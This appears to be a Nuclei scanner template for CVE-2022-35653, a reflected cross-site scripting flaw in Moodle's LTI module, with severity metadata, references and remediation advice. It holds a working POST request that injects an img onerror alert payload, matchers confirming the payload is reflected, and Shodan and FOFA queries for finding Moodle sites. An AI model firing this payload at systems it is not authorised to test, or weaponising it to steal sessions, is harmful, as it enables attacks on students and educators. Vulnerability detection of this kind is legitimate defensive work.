id: CVE-2022-35653

info:
  name: Moodle LTI module Reflected - Cross-Site Scripting
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.
  impact: |
    Attackers can inject malicious JavaScript through the LTI module that executes in educators' or students' browsers, potentially stealing Moodle session credentials and accessing sensitive course information.
  remediation: |
    Update Moodle to a patched version that properly sanitizes user input in the LTI module and prevents execution of injected scripts.
  reference:
    - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35653
    - https://bugzilla.redhat.com/show_bug.cgi?id=2106277
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35653
    cwe-id: CWE-79
    epss-score: 0.83646
    epss-percentile: 0.99309
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
    shodan-query:
      - title:"Moodle"
      - cpe:"cpe:2.3:a:moodle:moodle"
      - http.title:"moodle"
    fofa-query: title="moodle"
    google-query: intitle:"moodle"
  tags: cve,cve2022,moodle,xss,vkev,vuln

http:
  - raw:
      - |
        POST /mod/lti/auth.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xxx"><img/src%3d'x'onerror%3dalert('document_domain')>=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src='x'onerror=alert('document_domain')>"
          - "moodle-editor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220123910bee302427a419424a8a8e1c8e16c9888d0e27fee226f2878a39861bde3022018b04d20ecc927b9afdc5b8f9b7ee6f7705589dd3234968055dbc1ff2b6bd047:922c64590222798bb761d5b6d8e72950